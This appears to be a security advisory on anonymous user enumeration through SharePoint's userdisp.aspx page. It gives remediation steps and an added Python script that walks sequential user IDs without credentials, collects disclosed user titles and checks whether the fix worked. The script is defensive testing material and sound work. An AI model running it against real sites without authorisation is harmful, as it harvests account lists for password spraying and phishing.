SharePoint user enumeration
Description
Microsoft SharePoint contains a user enumeration weakness in the userdisp.aspx application page (served from the site's _layouts path) when anonymous access is enabled on the web application zone or site that hosts it. The page renders the entry from the site's User Information List whose integer ID is supplied in the ID query parameter. Because those IDs are small sequential integers, an unauthenticated attacker can request ID=1, 2, 3, ... in turn, tell used IDs from unused ones by the page returned, and collect the display name, account name and other profile fields shown for every user. No credentials and no prior knowledge of any username are required, so this misconfiguration hands an unauthorized party a complete list of accounts to use in password spraying or phishing.
Remediation
Remove anonymous access from the zone or site that exposes userdisp.aspx and the related user profile pages; application pages under _layouts inherit the site's anonymous setting, so the fix is applied at the zone or site level rather than per page. Navigate to SharePoint Central Administration, select the web application, and configure the following:
1. Go to Central Administration > Application Management > Manage web applications
2. Select the affected web application and click Authentication Providers
3. Ensure Anonymous Access is disabled for the zone (repeat for every zone the web application is extended to, for example an extranet or internet zone)
4. For the User Profile Service Application, verify that the 'Everyone' group has been removed from the permissions that allow viewing other users' profiles
5. Set site permissions so that only authenticated users can access user profile and user information pages; if anonymous access is a business requirement for part of the site, keep it scoped to that content rather than the whole zone
6. Implement network-level access controls to restrict access to administrative and user enumeration endpoints
After making changes, verify that unauthenticated requests to userdisp.aspx return an access denied response (HTTP 401/403) or a redirect to the sign-in page rather than user information. Check this for an ID that exists and for one that does not: the fix is only complete when both are denied, since a response that still distinguishes "user does not exist" from a user page lets enumeration continue.
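The following script is an added example for this advisory, not SharePoint's own code or a vendor tool. It performs the enumeration described above (walking userdisp.aspx?ID=1..N without credentials and classifying each reply) and reuses the same probe as the post-remediation check. Everything about the target's responses is an assumption to be confirmed with one manual request: that the page is at <site>/_layouts/userdisp.aspx, that a valid ID returns 200 with the user form, that an unused ID returns a page saying the user "does not exist" or "cannot be found", and that after the fix anonymous requests get 401/403 or a redirect to a sign-in page. The fetch function is injectable so the logic can be exercised offline with a fake server.

```python
# Added example for this advisory, not SharePoint's own code or a vendor tool.
# Assumptions (hypothetical, confirm against the target): page path, the
# "does not exist"/"cannot be found" marker for unused IDs, and the sign-in
# redirect patterns used to recognise a denied request.
import re
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, Tuple


@dataclass
class Response:
    status: int
    url: str    # final URL after redirects, so a sign-in redirect is visible
    body: str


USERDISP = "/_layouts/userdisp.aspx?ID={uid}"
# Markers assumed for this example; adjust after one manual request.
NOT_FOUND = re.compile(r"does not exist|cannot be found", re.I)
SIGN_IN = re.compile(r"authenticate\.aspx|/_login/|login\.microsoftonline\.com", re.I)
TITLE = re.compile(r"<title>(.*?)</title>", re.I | re.S)

Fetch = Callable[[str], Response]


def classify(resp: Response) -> str:
    """'denied' = access control worked, 'missing' = ID unused, 'disclosed' = leak."""
    if resp.status in (401, 403) or SIGN_IN.search(resp.url):
        return "denied"
    if resp.status == 404 or NOT_FOUND.search(resp.body):
        return "missing"
    if resp.status == 200:
        return "disclosed"
    return "unknown"


def http_fetch(url: str, timeout: float = 10.0) -> Response:
    """Anonymous GET: no cookies or credentials, redirects followed, 4xx returned not raised."""
    req = urllib.request.Request(url, headers={"User-Agent": "userdisp-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as r:
            return Response(r.status, r.geturl(), r.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as e:
        body = e.read().decode("utf-8", "replace") if e.fp else ""
        return Response(e.code, url, body)


def enumerate_users(base_url: str, fetch: Fetch, max_id: int = 500,
                    stop_after_misses: int = 25) -> Tuple[Dict[int, str], Dict[str, int]]:
    """Walk ID=1..max_id. Returns {id: page title} for disclosed IDs plus per-class counts.

    IDs in the User Information List are sparse (deleted users leave gaps), so a
    run of misses, not the first one, ends the walk. A single 'denied' ends it
    because the whole page is then behind authentication.
    """
    found: Dict[int, str] = {}
    counts = {"denied": 0, "missing": 0, "disclosed": 0, "unknown": 0}
    misses = 0
    for uid in range(1, max_id + 1):
        resp = fetch(base_url.rstrip("/") + USERDISP.format(uid=uid))
        kind = classify(resp)
        counts[kind] += 1
        if kind == "disclosed":
            m = TITLE.search(resp.body)
            found[uid] = m.group(1).strip() if m else ""
            misses = 0
        elif kind == "missing":
            misses += 1
            if misses >= stop_after_misses:
                break
        elif kind == "denied":
            break
    return found, counts


def is_remediated(base_url: str, fetch: Fetch, probe_ids=(1, 2, 3)) -> bool:
    """Post-fix check: every anonymous probe must be denied, not merely 'missing'."""
    return all(classify(fetch(base_url.rstrip("/") + USERDISP.format(uid=u))) == "denied"
               for u in probe_ids)


if __name__ == "__main__":
    import sys
    site = sys.argv[1] if len(sys.argv) > 1 else "https://sharepoint.example.local/sites/team"
    users, counts = enumerate_users(site, http_fetch)
    print(f"remediated={is_remediated(site, http_fetch)} counts={counts}")
    for uid, title in users.items():
        print(f"  ID={uid}: {title}")
```

Run it as `python userdisp_check.py https://<site>` before and after the change: a vulnerable zone prints a list of IDs with page titles, a fixed one prints `remediated=True` with a single denied probe. Keep `stop_after_misses` generous on large sites, since a "user does not exist" reply for one ID says nothing about the next.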